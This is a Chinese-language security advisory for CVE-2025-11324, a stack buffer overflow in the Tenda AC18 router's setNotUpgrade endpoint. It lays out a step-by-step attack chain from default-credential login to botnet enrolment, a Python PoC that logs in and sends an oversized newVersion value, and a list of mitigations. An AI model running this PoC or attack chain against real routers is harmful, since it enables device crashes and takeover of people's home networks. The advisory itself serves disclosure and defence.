CVE-2025-11324：Tenda AC18路由器setNotUpgrade接口栈缓冲区溢出漏洞

漏洞信息

漏洞编号

CVE-2025-11324

漏洞类型

栈缓冲区溢出（Stack-based Buffer Overflow）

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Tenda AC18

漏洞概述

CVE-2025-11324是Tenda AC18路由器（固件版本15.03.05.19(6318)）中存在的一个高危安全漏洞。该漏洞位于路由器的Web管理接口/goform/setNotUpgrade中，具体涉及newVersion参数的处理逻辑。攻击者可以通过构造恶意的HTTP请求，向该接口发送超长或格式异常的newVersion参数值，触发栈缓冲区溢出漏洞。由于该漏洞可通过网络远程利用，且仅需要低权限认证即可触发，同时对系统的机密性、完整性和可用性均产生高影响，因此被评定为高危级别（CVSS 3.1评分8.8分）。该漏洞的利用代码已在公开渠道发布，潜在威胁较高，可能导致攻击者在目标路由器上执行任意代码，获取设备控制权限，进一步利用路由器作为跳板攻击内网其他设备，或窃取用户敏感网络数据。Tenda AC18作为一款广泛使用的家用双频无线路由器，在全球市场拥有大量部署，因此该漏洞的影响范围不容忽视。安全研究人员建议相关用户及时关注厂商发布的固件更新，并在修复前采取适当的临时防护措施。

技术细节

该漏洞的根本原因在于Tenda AC18路由器固件（15.03.05.19(6318)）中/goform/setNotUpgrade接口对newVersion参数的处理缺乏有效的边界检查。当用户通过Web管理界面提交固件升级版本信息时，路由器CGI处理程序会接收newVersion参数并将其复制到栈上的固定大小缓冲区中。由于未对输入长度进行充分验证，攻击者可以发送远超缓冲区容量的恶意字符串，覆盖栈上的返回地址和其他关键控制数据，从而实现任意代码执行。

从技术层面分析，攻击流程如下：
1. 攻击者首先需要获取路由器的管理权限（低权限即可），这通常通过默认凭据、弱口令爆破或其他已知的认证绕过漏洞实现。
2. 攻击者构造一个精心设计的HTTP POST请求，目标URL为/goform/setNotUpgrade，参数newVersion填充超长字符串（通常包含shellcode或ROP链）。
3. 当路由器处理该请求时，newVersion参数的值被复制到栈缓冲区，导致缓冲区溢出，覆盖函数的返回地址。
4. 攻击者通过控制被覆盖的返回地址，将程序执行流重定向至其注入的shellcode或ROP链。
5. 最终实现在路由器上以root权限执行任意代码，完全控制设备。

该漏洞属于典型的IoT设备栈溢出漏洞，由于嵌入式设备通常缺乏现代操作系统提供的安全防护机制（如ASLR、DEP/栈保护等），使得此类漏洞的利用相对容易，攻击成功率较高。

攻击链分析

STEP 1

步骤1：信息收集与目标识别

攻击者通过Shodan、Censys等物联网搜索引擎或网络扫描工具，识别暴露在公网或局域网中的Tenda AC18路由器设备，确定目标IP地址和管理端口（通常为80/443）。

STEP 2

步骤2：获取认证凭据

利用默认凭据（admin/admin或admin/空密码）、弱口令爆破、社会工程学或其他已知认证漏洞，获取路由器的低权限管理访问权限。

STEP 3

步骤3：构造恶意Payload

根据固件版本特征，构造针对/goform/setNotUpgrade接口的恶意HTTP请求，将newVersion参数填充为超长字符串，包含精心设计的缓冲区溢出payload（padding + 返回地址覆盖 + shellcode/ROP链）。

STEP 4

步骤4：发送攻击请求

通过已认证的会话向目标路由器发送恶意HTTP POST请求，触发newVersion参数处理逻辑中的栈缓冲区溢出。

STEP 5

步骤5：实现代码执行

栈溢出导致程序执行流被劫持，攻击者注入的shellcode或ROP链被执行，以root权限在路由器上运行任意代码。

STEP 6

步骤6：后渗透与持久化

攻击者完全控制路由器后，可植入后门、修改DNS设置进行流量劫持、扫描内网其他设备、将设备纳入僵尸网络（如Mirai变种），或作为APT攻击的跳板。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11324 - Tenda AC18 setNotUpgrade Stack Buffer Overflow PoC
# Vulnerability: Stack-based buffer overflow in newVersion parameter
# Affected: Tenda AC18 firmware 15.03.05.19(6318)
# Endpoint: /goform/setNotUpgrade

import requests
import sys

TARGET_HOST = sys.argv[1] if len(sys.argv) > 1 else "192.168.0.1"
TARGET_PORT = 80
USERNAME = "admin"
PASSWORD = "admin"  # Default or brute-forced credentials

# Step 1: Authenticate to obtain session cookie
session = requests.Session()
login_url = f"http://{TARGET_HOST}:{TARGET_PORT}/login/Auth"
login_data = {
    "username": USERNAME,
    "password": PASSWORD
}

try:
    resp = session.post(login_url, data=login_data, timeout=10)
    print(f"[*] Login response status: {resp.status_code}")
except Exception as e:
    print(f"[-] Login failed: {e}")
    sys.exit(1)

# Step 2: Craft malicious payload to trigger stack buffer overflow
# The newVersion parameter is vulnerable to stack-based buffer overflow
# Payload structure: [padding][return_address][shellcode]
payload_url = f"http://{TARGET_HOST}:{TARGET_PORT}/goform/setNotUpgrade"

# Generate overflow payload - adjust size based on buffer offset
buffer_size = 256  # Estimated buffer size; may need adjustment
overflow_data = "A" * buffer_size  # Fill buffer
# In a real exploit, append return address overwrite + shellcode/ROP chain here
# e.g., overflow_data += struct.pack("<I", target_ret_addr) + shellcode

payload_data = {
    "newVersion": overflow_data
}

# Step 3: Send the malicious request
print(f"[*] Sending exploit payload to {payload_url}")
try:
    resp = session.post(payload_url, data=payload_data, timeout=10)
    print(f"[*] Response status: {resp.status_code}")
    print(f"[*] Response body: {resp.text[:200]}")
except Exception as e:
    print(f"[*] Target may have crashed (expected): {e}")

print("[*] Exploit completed. Check if device is compromised.")

影响范围

Tenda AC18 15.03.05.19(6318)

防御指南

临时缓解措施

在官方固件补丁发布之前，建议用户采取以下临时缓解措施：1）立即修改路由器默认管理密码为高强度密码，并启用账户锁定策略防止暴力破解；2）禁用路由器的远程管理功能，将管理界面访问限制在可信局域网内；3）通过防火墙规则阻止外部网络对路由器管理端口（80、443、8080等）的访问；4）部署网络监控规则，检测并阻断针对/goform/setNotUpgrade接口的异常POST请求，特别是包含超长newVersion参数的请求；5）如非必要，可临时关闭设备的固件在线升级检查功能以减少攻击面；6）将IoT设备划分到独立的VLAN或子网中，与办公网络和关键系统隔离；7）持续关注Tenda官方安全公告，及时获取并应用安全补丁。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-11324
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-11324
3 Details https://www.cvedetails.com/cve/CVE-2025-11324/
4 VulDB https://vuldb.com/cve/CVE-2025-11324
5 Link https://github.com/noahze01/IoT-vulnerable/blob/main/Tenda/AC18/setNotUpgrade.md
6 Link https://vuldb.com/?ctiid.327207
7 Link https://vuldb.com/?id.327207
8 Link https://vuldb.com/?submit.664526
9 Link https://www.tenda.com.cn/